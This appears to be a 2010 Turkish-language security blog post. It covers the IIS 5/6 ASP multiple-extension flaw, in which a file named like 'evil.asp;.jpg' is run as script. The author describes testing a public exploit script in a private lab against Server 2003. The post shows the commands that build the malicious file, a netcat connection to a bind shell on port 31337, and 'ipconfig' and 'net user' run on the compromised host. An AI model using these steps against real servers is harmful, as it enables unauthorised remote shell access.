IIS ASP Multiple Extensions Remote Exploit

Posted by Uğur Engin on January 10, 2010 Leave a comment (0) Go to comments

Windows IIS sunucular üzerinde ciddi bir güvenlik açığı yayınlandı.İlgili exploit araciligiyla olusturulabilecek bir malicious dosyası(06;.jpg) , IIS sunucu(5,6) üzerinde çalıştırıldığında sunucunun Outgoing den, atacker’in source’sine doğru 31337. portun açılmasınına sebep oluyor.Daha sonra doğru payload’ı kullanabilecek kişi, sunucu üzerinden shell alabiliyor.

Patch cozumu gelistirmek icin ilgili exploiti virtual bir Windows Server da test ettim.

Shellcode / Payload Connection

0 – shell_bind_tcp

Penetration materyaller:

OS : Server 2003 Enterprise x86 SP2
Victim Vlan: 192.168.127.130
Web Server : IIS6
Destination: Ubuntu 9.10 (karmic)

Testleri yapalım:

root@ubuntu:~/labs# python iis.py def.jpg 0
Exploit for Microsoft IIS ASP Multiple Extensions Security Bypass 5.x/6.x
By Emanuele Gentili and Emanuele Acri (http://backtrack.it)
[+] File evil.asp;.jpg created and ready to use.
Enjoy… ;)

root@ubuntu:~/labs# ls -l
total 1260
-rw-r–r– 1 root root 12902 2009-10-31 01:08 def.jpg
-rw-r–r– 1 root root 326377 2010-01-10 14:08 evil.asp;.jpg
-rwxrwxrwx 1 root root 945931 2010-01-10 14:03 iis.py

evil.asp;.jpg vulnerable durumda olan dosyayı IIS sunucuda çalıştıralım.

root@ubuntu:~/labs# nc -vv 192.168.127.130 31337
192.168.127.130: inverse host lookup failed: Unknown hosit
(UNKNOWN) [192.168.127.130] 31337 (?) open
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

c:\windows\system32\inetsrv>ipconfig

Windows IP ConfigurationEthernet adapter Local Area Connection:
Connection-specific DNS Suffix . : localdomain
IP Address. . . . . . . . . . . . : 192.168.127.130
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.127.2

c:\windows\system32\inetsrv>net user
User accounts for \\LOCALROOT